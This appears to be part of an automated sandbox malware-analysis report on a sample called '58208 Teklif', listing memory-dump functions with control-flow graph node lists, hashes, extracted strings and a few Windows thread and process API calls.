                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e2f725912917dcd81cf119189ca669e7b7ccd8f2abbc51dbafb6835ad80aff7
                                                      • Instruction ID: 778bb822ddfedf98f9c6d4c8ae5a3afe7eb41b91b2f5c2da803c81044af7e529
                                                      • Opcode Fuzzy Hash: 2e2f725912917dcd81cf119189ca669e7b7ccd8f2abbc51dbafb6835ad80aff7
                                                      • Instruction Fuzzy Hash: A2416CB1E016188BEB58CF6BD9457D9FAF3AFC8300F04C1AAC50CA6254EB740A86CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDC7CA Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7c5ace5bcf15e7df9450496092159df6cba1c72c21274507601216c442f83efd
                                                      • Instruction ID: 86997394785fd13efe39382263ec459f6aeb9ab7781a6fe641a6d6aaa908cf07
                                                      • Opcode Fuzzy Hash: 7c5ace5bcf15e7df9450496092159df6cba1c72c21274507601216c442f83efd
                                                      • Instruction Fuzzy Hash: FA413BB1E016188BEB58CF6BD9457D9FAF3AFC9310F14C1AAC50CA6254EB740A86CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01416EB8 Relevance: 10.5, Strings: 8, Instructions: 473COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 527 1416eb8-1416eed 528 1416ef3-1416f16 527->528 529 141731c-1417320 527->529 538 1416fc4-1416fc8 528->538 539 1416f1c-1416f29 528->539 530 1417322-1417336 529->530 531 1417339-1417347 529->531 536 1417349-141735e 531->536 537 14173b8-14173cd 531->537 545 1417360-1417363 536->545 546 1417365-1417372 536->546 547 14173d4-14173e1 537->547 548 14173cf-14173d2 537->548 542 1417010-1417019 538->542 543 1416fca-1416fd8 538->543 551 1416f38 539->551 552 1416f2b-1416f36 539->552 549 141742f 542->549 550 141701f-1417029 542->550 543->542 563 1416fda-1416ff5 543->563 553 1417374-14173b5 545->553 546->553 554 14173e3-141741e 547->554 548->554 557 1417434-1417464 549->557 550->529 555 141702f-1417038 550->555 558 1416f3a-1416f3c 551->558 552->558 603 1417425-141742c 554->603 561 1417047-1417053 555->561 562 141703a-141703f 555->562 590 1417466-141747c 557->590 591 141747d-1417484 557->591 558->538 565 1416f42-1416fa4 558->565 561->557 568 1417059-141705f 561->568 562->561 584 1417003 563->584 585 1416ff7-1417001 563->585 614 1416fa6 565->614 615 1416faa-1416fc1 565->615 569 1417065-1417075 568->569 570 1417306-141730a 568->570 582 1417077-1417087 569->582 583 1417089-141708b 569->583 570->549 574 1417310-1417316 570->574 574->529 574->555 588 141708e-1417094 582->588 583->588 589 1417005-1417007 584->589 585->589 588->570 596 141709a-14170a9 588->596 589->542 597 1417009 589->597 599 1417157-1417182 call 1416d00 * 2 596->599 600 14170af 596->600 597->542 620 1417188-141718c 599->620 621 141726c-1417286 599->621 605 14170b2-14170c3 600->605 605->557 607 14170c9-14170db 605->607 607->557 610 14170e1-14170f9 607->610 672 14170fb call 1417488 610->672 673 14170fb call 1417498 610->673 613 1417101-1417111 613->570 617 1417117-141711a 613->617 614->615 615->538 618 1417124-1417127 617->618 619 141711c-1417122 617->619 618->549 622 141712d-1417130 618->622 619->618 619->622 620->570 624 1417192-1417196 620->624 621->529 639 141728c-1417290 621->639 627 1417132-1417136 622->627 628 1417138-141713b 622->628 625 1417198-14171a5 624->625 626 14171be-14171c4 624->626 642 14171b4 625->642 643 14171a7-14171b2 625->643 631 14171c6-14171ca 626->631 632 14171ff-1417205 626->632 627->628 630 1417141-1417145 627->630 628->549 628->630 630->549 637 141714b-1417151 630->637 631->632 638 14171cc-14171d5 631->638 634 1417211-1417217 632->634 635 1417207-141720b 632->635 640 1417223-1417225 634->640 641 1417219-141721d 634->641 635->603 635->634 637->599 637->605 644 14171e4-14171fa 638->644 645 14171d7-14171dc 638->645 646 1417292-141729c call 1415ba8 639->646 647 14172cc-14172d0 639->647 648 1417227-1417230 640->648 649 141725a-141725c 640->649 641->570 641->640 650 14171b6-14171b8 642->650 643->650 644->570 645->644 646->647 660 141729e-14172b3 646->660 647->603 651 14172d6-14172da 647->651 654 1417232-1417237 648->654 655 141723f-1417255 648->655 649->570 656 1417262-1417269 649->656 650->570 650->626 651->603 658 14172e0-14172ed 651->658 654->655 655->570 663 14172fc 658->663 664 14172ef-14172fa 658->664 660->647 669 14172b5-14172ca 660->669 666 14172fe-1417300 663->666 664->666 666->570 666->603 669->529 669->647 672->613 673->613
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                      • API String ID: 0-3630396145
                                                      • Opcode ID: 38ff28b70c09d140c06146aefcf35a887f026ea26339ca7486c7444fc87ae25e
                                                      • Instruction ID: b102c21985de1c90be7bc45f5f111545a76429f37bcff3bebf4c5329e173d3e6
                                                      • Opcode Fuzzy Hash: 38ff28b70c09d140c06146aefcf35a887f026ea26339ca7486c7444fc87ae25e
                                                      • Instruction Fuzzy Hash: 5C125934A002099FCB15CF69D984AAEBBF2FF48315F1585AAE9099B379D730ED41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BF4B68 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 697 6bf4b68-6bf4bf7 GetCurrentProcess 701 6bf4bf9-6bf4bff 697->701 702 6bf4c00-6bf4c34 GetCurrentThread 697->702 701->702 703 6bf4c3d-6bf4c71 GetCurrentProcess 702->703 704 6bf4c36-6bf4c3c 702->704 705 6bf4c7a-6bf4c92 703->705 706 6bf4c73-6bf4c79 703->706 704->703 718 6bf4c95 call 6bf4d48 705->718 719 6bf4c95 call 6bf4d43 705->719 706->705 710 6bf4c9b-6bf4cca GetCurrentThreadId 711 6bf4ccc-6bf4cd2 710->711 712 6bf4cd3-6bf4d35 710->712 711->712 718->710 719->710
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4BE6
                                                      • GetCurrentThread.KERNEL32 ref: 06BF4C23
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4C60
                                                      • GetCurrentThreadId.KERNEL32 ref: 06BF4CB9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 05befbbd07d73426ca6238a0f40fa8462f060fc079fc373faacc78345aff4c76
                                                      • Instruction ID: 9c1d34bea321b4a8ef9e31b9826bd0f0144279b25ada3a17b184303982b1808c
                                                      • Opcode Fuzzy Hash: 05befbbd07d73426ca6238a0f40fa8462f060fc079fc373faacc78345aff4c76
                                                      • Instruction Fuzzy Hash: 4D5146B09002098FDB94DFAAD948B9EBFF1FF49300F208059E119A7361D7759948CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BF4B63 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 674 6bf4b63-6bf4bf7 GetCurrentProcess 678 6bf4bf9-6bf4bff 674->678 679 6bf4c00-6bf4c34 GetCurrentThread 674->679 678->679 680 6bf4c3d-6bf4c71 GetCurrentProcess 679->680 681 6bf4c36-6bf4c3c 679->681 682 6bf4c7a-6bf4c92 680->682 683 6bf4c73-6bf4c79 680->683 681->680 695 6bf4c95 call 6bf4d48 682->695 696 6bf4c95 call 6bf4d43 682->696 683->682 687 6bf4c9b-6bf4cca GetCurrentThreadId 688 6bf4ccc-6bf4cd2 687->688 689 6bf4cd3-6bf4d35 687->689 688->689 695->687 696->687
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4BE6
                                                      • GetCurrentThread.KERNEL32 ref: 06BF4C23
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4C60
                                                      • GetCurrentThreadId.KERNEL32 ref: 06BF4CB9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 0aa12f1eb1e780cf02d2348a75a4b7251deb552b3b2a0230099b82ddddc2d888
                                                      • Instruction ID: 79ab7f6fb9043a6fdd11253a5668dfb64a662b20a4d9ebb367ffcf68262019e9
                                                      • Opcode Fuzzy Hash: 0aa12f1eb1e780cf02d2348a75a4b7251deb552b3b2a0230099b82ddddc2d888
                                                      • Instruction Fuzzy Hash: BD5154B09002098FDB94DFAAD948BAEBFF1FF48300F208059E009AB361D7359948CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01417850 Relevance: 3.2, Strings: 2, Instructions: 688COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1828 1417850-1417d3e 1903 1418290-14182c5 1828->1903 1904 1417d44-1417d54 1828->1904 1909 14182d1-14182ef 1903->1909 1910 14182c7-14182cc 1903->1910 1904->1903 1905 1417d5a-1417d6a 1904->1905 1905->1903 1906 1417d70-1417d80 1905->1906 1906->1903 1908 1417d86-1417d96 1906->1908 1908->1903 1912 1417d9c-1417dac 1908->1912 1921 14182f1-14182fb 1909->1921 1922 1418366-1418372 1909->1922 1911 14183b6-14183bb 1910->1911 1912->1903 1913 1417db2-1417dc2 1912->1913 1913->1903 1915 1417dc8-1417dd8 1913->1915 1915->1903 1916 1417dde-1417dee 1915->1916 1916->1903 1918 1417df4-1417e04 1916->1918 1918->1903 1920 1417e0a-1417e1a 1918->1920 1920->1903 1923 1417e20-141828f 1920->1923 1921->1922 1927 14182fd-1418309 1921->1927 1928 1418374-1418380 1922->1928 1929 1418389-1418395 1922->1929 1937 141830b-1418316 1927->1937 1938 141832e-1418331 1927->1938 1928->1929 1939 1418382-1418387 1928->1939 1934 1418397-14183a3 1929->1934 1935 14183ac-14183ae 1929->1935 1934->1935 1948 14183a5-14183aa 1934->1948 1935->1911 2015 14183b0 call 1418849 1935->2015 1937->1938 1950 1418318-1418322 1937->1950 1940 1418333-141833f 1938->1940 1941 1418348-1418354 1938->1941 1939->1911 1940->1941 1951 1418341-1418346 1940->1951 1944 1418356-141835d 1941->1944 1945 14183bc-14183d3 1941->1945 1944->1945 1949 141835f-1418364 1944->1949 1948->1911 1949->1911 1950->1938 1956 1418324-1418329 1950->1956 1951->1911 1956->1911 2015->1911
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $_q$$_q
                                                      • API String ID: 0-458585787
                                                      • Opcode ID: 8925f136f02f587157f8762a016d3beafea3bb63e1b121b5a85c76984af2d092
                                                      • Instruction ID: 1baf0bca26490170811a0055ab53f745515ca059fa9afce034a3d2d346f339f4
                                                      • Opcode Fuzzy Hash: 8925f136f02f587157f8762a016d3beafea3bb63e1b121b5a85c76984af2d092
                                                      • Instruction Fuzzy Hash: 0B522B74A00219CFEB15DBA5C860B9EBBB2FF94300F1081AED14A6F3A8DA355D45DF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01418849 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2260 1418849-1418865 2261 1418871-141887d 2260->2261 2262 1418867-141886c 2260->2262 2265 141888d-1418892 2261->2265 2266 141887f-1418881 2261->2266 2263 1418c06-1418c0b 2262->2263 2265->2263 2267 1418889-141888b 2266->2267 2267->2265 2268 1418897-14188a3 2267->2268 2270 14188b3-14188b8 2268->2270 2271 14188a5-14188b1 2268->2271 2270->2263 2271->2270 2273 14188bd-14188c8 2271->2273 2275 1418972-141897d 2273->2275 2276 14188ce-14188d9 2273->2276 2279 1418a20-1418a2c 2275->2279 2280 1418983-1418992 2275->2280 2281 14188db-14188ed 2276->2281 2282 14188ef 2276->2282 2289 1418a3c-1418a4e 2279->2289 2290 1418a2e-1418a3a 2279->2290 2291 14189a3-14189b2 2280->2291 2292 1418994-141899e 2280->2292 2283 14188f4-14188f6 2281->2283 2282->2283 2285 1418916-141891b 2283->2285 2286 14188f8-1418907 2283->2286 2285->2263 2286->2285 2296 1418909-1418914 2286->2296 2304 1418a50-1418a5c 2289->2304 2305 1418a72-1418a77 2289->2305 2290->2289 2301 1418a7c-1418a87 2290->2301 2299 14189b4-14189c0 2291->2299 2300 14189d6-14189df 2291->2300 2292->2263 2296->2285 2308 1418920-1418929 2296->2308 2310 14189c2-14189c7 2299->2310 2311 14189cc-14189d1 2299->2311 2314 14189e1-14189f3 2300->2314 2315 14189f5 2300->2315 2312 1418b69-1418b74 2301->2312 2313 1418a8d-1418a96 2301->2313 2321 1418a68-1418a6d 2304->2321 2322 1418a5e-1418a63 2304->2322 2305->2263 2324 1418935-1418944 2308->2324 2325 141892b-1418930 2308->2325 2310->2263 2311->2263 2327 1418b76-1418b80 2312->2327 2328 1418b9e-1418bad 2312->2328 2329 1418a98-1418aaa 2313->2329 2330 1418aac 2313->2330 2316 14189fa-14189fc 2314->2316 2315->2316 2316->2279 2319 14189fe-1418a0a 2316->2319 2338 1418a16-1418a1b 2319->2338 2339 1418a0c-1418a11 2319->2339 2321->2263 2322->2263 2334 1418946-1418952 2324->2334 2335 1418968-141896d 2324->2335 2325->2263 2344 1418b82-1418b8e 2327->2344 2345 1418b97-1418b9c 2327->2345 2346 1418c01 2328->2346 2347 1418baf-1418bbe 2328->2347 2332 1418ab1-1418ab3 2329->2332 2330->2332 2336 1418ac3 2332->2336 2337 1418ab5-1418ac1 2332->2337 2353 1418954-1418959 2334->2353 2354 141895e-1418963 2334->2354 2335->2263 2343 1418ac8-1418aca 2336->2343 2337->2343 2338->2263 2339->2263 2350 1418ad6-1418ae9 2343->2350 2351 1418acc-1418ad1 2343->2351 2344->2345 2358 1418b90-1418b95 2344->2358 2345->2263 2346->2263 2347->2346 2356 1418bc0-1418bd8 2347->2356 2359 1418b21-1418b2b 2350->2359 2360 1418aeb 2350->2360 2351->2263 2353->2263 2354->2263 2369 1418bfa-1418bff 2356->2369 2370 1418bda-1418bf8 2356->2370 2358->2263 2366 1418b4a-1418b56 2359->2366 2367 1418b2d-1418b39 call 14182b8 2359->2367 2362 1418aee-1418aff call 14182b8 2360->2362 2372 1418b01-1418b04 2362->2372 2373 1418b06-1418b0b 2362->2373 2382 1418b58-1418b5d 2366->2382 2383 1418b5f 2366->2383 2380 1418b40-1418b45 2367->2380 2381 1418b3b-1418b3e 2367->2381 2369->2263 2370->2263 2372->2373 2374 1418b10-1418b13 2372->2374 2373->2263 2377 1418b19-1418b1f 2374->2377 2378 1418c0c-1418c20 2374->2378 2377->2359 2377->2362 2387 1418c72-1418c79 2378->2387 2388 1418c22 2378->2388 2380->2263 2381->2366 2381->2380 2384 1418b64 2382->2384 2383->2384 2384->2263 2391 1418c7b-1418c8a 2387->2391 2392 1418cae-1418cc0 2387->2392 2391->2392 2397 1418c8c-1418ca2 2391->2397 2395 1418cc6-1418cd4 2392->2395 2396 1418dbf 2392->2396 2401 1418ce0-1418ce3 2395->2401 2402 1418cd6-1418cdb 2395->2402 2398 1418dc1-1418dc5 2396->2398 2397->2392 2406 1418ca4-1418ca9 2397->2406 2404 1418dc6-1418dde 2401->2404 2405 1418ce9-1418cec 2401->2405 2402->2398 2405->2395 2407 1418cee 2405->2407 2406->2398 2407->2396
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'_q$4'_q
                                                      • API String ID: 0-531570531
                                                      • Opcode ID: de5644a8ab792e10f692615662bd7e1a07bd24308db048e797e6cc9870e48aa6
                                                      • Instruction ID: 7510b1e88b0c1c0f6bebe3a8c19a2394b20ed79cd5202d0797eebdc494a20f79
                                                      • Opcode Fuzzy Hash: de5644a8ab792e10f692615662bd7e1a07bd24308db048e797e6cc9870e48aa6
                                                      • Instruction Fuzzy Hash: 81B16F747406038FEB159B2DC554B3A3B9AAF85644F15446BE502CF3BAEA34DC82C742
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01415700 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2409 1415700-1415722 2410 1415724-1415728 2409->2410 2411 1415738-1415743 2409->2411 2414 1415750-1415757 2410->2414 2415 141572a-1415736 2410->2415 2412 1415749-141574b 2411->2412 2413 14157eb-1415817 2411->2413 2416 14157e3-14157e8 2412->2416 2422 141581e-1415876 2413->2422 2417 1415777-141578a call 1415700 2414->2417 2418 1415759-1415760 2414->2418 2415->2411 2415->2414 2424 1415792-141579a 2417->2424 2425 141578c-1415790 2417->2425 2418->2417 2419 1415762-141576d 2418->2419 2421 1415773-1415775 2419->2421 2419->2422 2421->2416 2441 1415885-1415897 2422->2441 2442 1415878-141587e 2422->2442 2429 14157a9-14157ab 2424->2429 2430 141579c-14157a1 2424->2430 2425->2424 2428 14157ad-14157cc call 141617d 2425->2428 2434 14157e1 2428->2434 2435 14157ce-14157d7 2428->2435 2429->2416 2430->2429 2434->2416 2488 14157d9 call 141a6c5 2435->2488 2489 14157d9 call 141a76d 2435->2489 2438 14157df 2438->2416 2444 141592b-141592f call 1415ac8 2441->2444 2445 141589d-14158a1 2441->2445 2442->2441 2448 1415935-141593b 2444->2448 2446 14158b1-14158be 2445->2446 2447 14158a3-14158af 2445->2447 2455 14158c0-14158ca 2446->2455 2447->2455 2451 1415947-141594e 2448->2451 2452 141593d-1415943 2448->2452 2453 1415945 2452->2453 2454 14159a9-14159f7 2452->2454 2453->2451 2493 14159f9 call 6bd2a38 2454->2493 2494 14159f9 call 6bd2a33 2454->2494 2458 14158f7-14158fb 2455->2458 2459 14158cc-14158db 2455->2459 2460 1415907-141590b 2458->2460 2461 14158fd-1415903 2458->2461 2470 14158eb-14158f5 2459->2470 2471 14158dd-14158e4 2459->2471 2460->2451 2465 141590d-1415911 2460->2465 2463 1415951-14159a2 2461->2463 2464 1415905 2461->2464 2463->2454 2464->2451 2467 1415917-1415929 2465->2467 2468 1415a0f-1415a26 2465->2468 2467->2451 2470->2458 2471->2470 2483 14159ff-1415a08 2483->2468 2488->2438 2489->2438 2493->2483 2494->2483
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hcq$Hcq
                                                      • API String ID: 0-4088181183
                                                      • Opcode ID: da5318491b84dc771b40fb4c7ccdac93dd89daf3b4c680af0c229f811fcdd5ed
                                                      • Instruction ID: c6899e3639092e7142f4a3ffe8b45f9385d2c298682cd07db70a8c5e56e8fffb
                                                      • Opcode Fuzzy Hash: da5318491b84dc771b40fb4c7ccdac93dd89daf3b4c680af0c229f811fcdd5ed
                                                      • Instruction Fuzzy Hash: C991B0317442558FDB159F29C858BAF7BE6BBCA300F14886AE4468F3A9DB349C41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01415C60 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2495 1415c60-1415c6d 2496 1415c75-1415c77 2495->2496 2497 1415c6f-1415c73 2495->2497 2499 1415e88-1415e8f 2496->2499 2497->2496 2498 1415c7c-1415c87 2497->2498 2500 1415e90 2498->2500 2501 1415c8d-1415c94 2498->2501 2506 1415e95-1415ecd 2500->2506 2502 1415e29-1415e2f 2501->2502 2503 1415c9a-1415ca9 2501->2503 2504 1415e31-1415e33 2502->2504 2505 1415e35-1415e39 2502->2505 2503->2506 2507 1415caf-1415cbe 2503->2507 2504->2499 2508 1415e86 2505->2508 2509 1415e3b-1415e41 2505->2509 2525 1415ed6-1415eda 2506->2525 2526 1415ecf-1415ed4 2506->2526 2513 1415cc0-1415cc3 2507->2513 2514 1415cd3-1415cd6 2507->2514 2508->2499 2509->2500 2511 1415e43-1415e46 2509->2511 2511->2500 2515 1415e48-1415e5d 2511->2515 2516 1415ce2-1415ce8 2513->2516 2517 1415cc5-1415cc8 2513->2517 2514->2516 2518 1415cd8-1415cdb 2514->2518 2532 1415e81-1415e84 2515->2532 2533 1415e5f-1415e65 2515->2533 2527 1415d00-1415d1d 2516->2527 2528 1415cea-1415cf0 2516->2528 2520 1415dc9-1415dcf 2517->2520 2521 1415cce 2517->2521 2522 1415cdd 2518->2522 2523 1415d2e-1415d34 2518->2523 2537 1415dd1-1415dd7 2520->2537 2538 1415de7-1415df1 2520->2538 2529 1415df4-1415df6 2521->2529 2522->2529 2530 1415d36-1415d3c 2523->2530 2531 1415d4c-1415d5e 2523->2531 2534 1415ee0-1415ee2 2525->2534 2526->2534 2565 1415d26-1415d29 2527->2565 2535 1415cf2 2528->2535 2536 1415cf4-1415cfe 2528->2536 2549 1415dff-1415e01 2529->2549 2539 1415d40-1415d4a 2530->2539 2540 1415d3e 2530->2540 2559 1415d60-1415d6c 2531->2559 2560 1415d6e-1415d91 2531->2560 2532->2499 2541 1415e77-1415e7a 2533->2541 2542 1415e67-1415e75 2533->2542 2543 1415ee4-1415ef6 2534->2543 2544 1415ef7-1415efe 2534->2544 2535->2527 2536->2527 2545 1415dd9 2537->2545 2546 1415ddb-1415de5 2537->2546 2538->2529 2539->2531 2540->2531 2541->2500 2551 1415e7c-1415e7f 2541->2551 2542->2500 2542->2541 2545->2538 2546->2538 2556 1415e03-1415e07 2549->2556 2557 1415e15-1415e17 2549->2557 2551->2532 2551->2533 2556->2557 2562 1415e09-1415e0d 2556->2562 2563 1415e1b-1415e1e 2557->2563 2569 1415db9-1415dc7 2559->2569 2560->2500 2571 1415d97-1415d9a 2560->2571 2562->2500 2566 1415e13 2562->2566 2563->2500 2567 1415e20-1415e23 2563->2567 2565->2529 2566->2563 2567->2502 2567->2503 2569->2529 2571->2500 2573 1415da0-1415db2 2571->2573 2573->2569
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,cq$,cq
                                                      • API String ID: 0-2927840315
                                                      • Opcode ID: ab6ef39996813b0733ab50e51cf4d9fd182d8c7b3ee44664e7469ae1277b43f9
                                                      • Instruction ID: 71e0a8e9fa0630cec47c57215fb803cd529b8fa118d5202c1aefe9cac08a8c25
                                                      • Opcode Fuzzy Hash: ab6ef39996813b0733ab50e51cf4d9fd182d8c7b3ee44664e7469ae1277b43f9
                                                      • Instruction Fuzzy Hash: 78817E34A002058FDB14DF6DC888AEABBB2BFCA214B55C56AD505DF379D731E842CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9960 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2575 6bd9960-6bd997f 2576 6bd9b3a-6bd9b5f 2575->2576 2577 6bd9985-6bd998e 2575->2577 2582 6bd9b66-6bd9c00 call 6bd9710 2576->2582 2581 6bd9994-6bd99e9 2577->2581 2577->2582 2590 6bd99eb-6bd9a10 2581->2590 2591 6bd9a13-6bd9a1c 2581->2591 2626 6bd9c05-6bd9c0a 2582->2626 2590->2591 2593 6bd9a1e 2591->2593 2594 6bd9a21-6bd9a31 2591->2594 2593->2594 2632 6bd9a33 call 6bd9bb0 2594->2632 2633 6bd9a33 call 6bd9b40 2594->2633 2634 6bd9a33 call 6bd9960 2594->2634 2635 6bd9a33 call 6bd9952 2594->2635 2597 6bd9a39-6bd9a3b 2599 6bd9a3d-6bd9a42 2597->2599 2600 6bd9a95-6bd9ae2 2597->2600 2601 6bd9a7b-6bd9a8e 2599->2601 2602 6bd9a44-6bd9a79 2599->2602 2614 6bd9ae9-6bd9aee 2600->2614 2601->2600 2602->2614 2615 6bd9af8-6bd9afd 2614->2615 2616 6bd9af0 2614->2616 2617 6bd9aff 2615->2617 2618 6bd9b07-6bd9b0c 2615->2618 2616->2615 2617->2618 2621 6bd9b0e-6bd9b1c call 6bd9584 call 6bd959c 2618->2621 2622 6bd9b21 2618->2622 2621->2622 2622->2576 2632->2597 2633->2597 2634->2597 2635->2597
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (&_q$(cq
                                                      • API String ID: 0-1128674267
                                                      • Opcode ID: ba90b8536123806ed6cd3da64eb0a333183fb8f73b5058b951c1106d879aafed
                                                      • Instruction ID: 4c0db90b4bd3b02e809660d28ac890c638ae488756aaf3c6df228724e4815d7f
                                                      • Opcode Fuzzy Hash: ba90b8536123806ed6cd3da64eb0a333183fb8f73b5058b951c1106d879aafed
                                                      • Instruction Fuzzy Hash: F5716271F002199FDB55EFA9C854AAEBBB6EFC4700F148569E405AB380EF349D06C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01413480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xcq$Xcq
                                                      • API String ID: 0-1149048318
                                                      • Opcode ID: d86612446439250f5a4b553a6df0743bcffed83530474454a72b40953c27e3cc
                                                      • Instruction ID: a9566fb18a41633fa4870779d8a4f412675bc95a11df951dd90a618df9a1d4bb
                                                      • Opcode Fuzzy Hash: d86612446439250f5a4b553a6df0743bcffed83530474454a72b40953c27e3cc
                                                      • Instruction Fuzzy Hash: D331F635B8022587EB1A4D6E959427F66EABBC4260F04443AE906C73ACDBB4CC458695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01419CA5 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q
                                                      • API String ID: 0-493409505
                                                      • Opcode ID: 39b73d4ae6229d5812d4e12852f3a3d5c8b0dba401afe458b6e9bd6128cf94f1
                                                      • Instruction ID: 8cb6714aa68435094d9adda46a11d4244cddaf32439d520dee78a9bb9a8c6c71
                                                      • Opcode Fuzzy Hash: 39b73d4ae6229d5812d4e12852f3a3d5c8b0dba401afe458b6e9bd6128cf94f1
